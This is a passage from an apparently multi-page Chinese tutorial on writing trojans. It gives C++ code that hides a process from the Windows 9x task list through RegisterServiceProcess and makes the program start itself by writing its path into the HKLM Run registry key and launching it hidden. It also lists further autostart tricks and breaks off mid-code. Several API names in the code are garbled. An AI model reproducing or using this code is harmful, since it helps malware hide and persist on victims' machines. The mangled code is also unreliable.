出于安全考虑，我只给出一种通过注册服务程序，实现进程伪隐藏的方法，对于更复杂，高级的隐藏方法，比如远程线程插入其他进程的方法，请参阅ShotGun的文章《NT系统下木马进程的隐藏与检测》。

　　WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)

　　{

　　try

　　{

　　DWORD dwVersion = GetVersion(); //取得Windows的版本号

　　if (dwVersion >= 0x80000000) // Windows 9x隐藏任务列表

　　{

　　int (VVBACK *rsp)(DWORD,DWORD);

　　HINSTANCE dll=LoadLibrary("KERNEL32.DLL"); //装入KERNEL32.DLL

　　rsp=(int(VVBACK *)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess"); //找到RegisterServiceProcess的入口

　　rsp(NULL,1); //注册服务

　　FreeLibrary(dll); //释放DLL模块

　　}

　　}

　　catch (Exception &exception) //处理异常事件

　　{

　　//处理异常事件

　　}

　　return 0;

　　}

　　3、程序的自加载运行技术

　　让程序自运行的方法比较多，除了最常见的方法：加载程序到启动组，写程序启动路径到注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersions\Run的方法外，还有很多其他的办法，据yagami讲，还有几十种方法之多，比如可以修改Boot.ini，或者通过注册表里的输入法键值直接挂接启动，通过修改Explorer.exe启动参数等等的方法，真的可以说是防不胜防，下面展示一段通过修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersions\Run键值来实现自启动的程序：

　　自装载部分：

　　HKEY hkey;

　　AnsiString NewProgramName=AnsiString(sys)+AnsiString("\\")+PName;

　　unsigned long k;

　　k=REG_OPENED_EXISTING_KEY;

　　RegCreateKeyEx(HKEY_LOCAL_MACHINE,

　　"SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\",

　　0L,

　　NULL,

　　REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS|KEY_SET_valuesss,

　　NULL,

　　&hkey,&k);

　　RegSetvaluesssEx(hkey,

　　"BackGroup",

　　0,

　　REG_SZ,

　　NewProgramName.c_str(),

　　NewProgramName.Length());

　　RegCloseKey(hkey);

　　if (int(Sh*ll Execute(Handle,

　　"open",

　　NewProgramName.c_str(),

　　NULL,

　　NULL,

　　SW_HIDE))>32)

　　{

上一页  [1] [2] [3] [4] [5] [6] [7] 下一页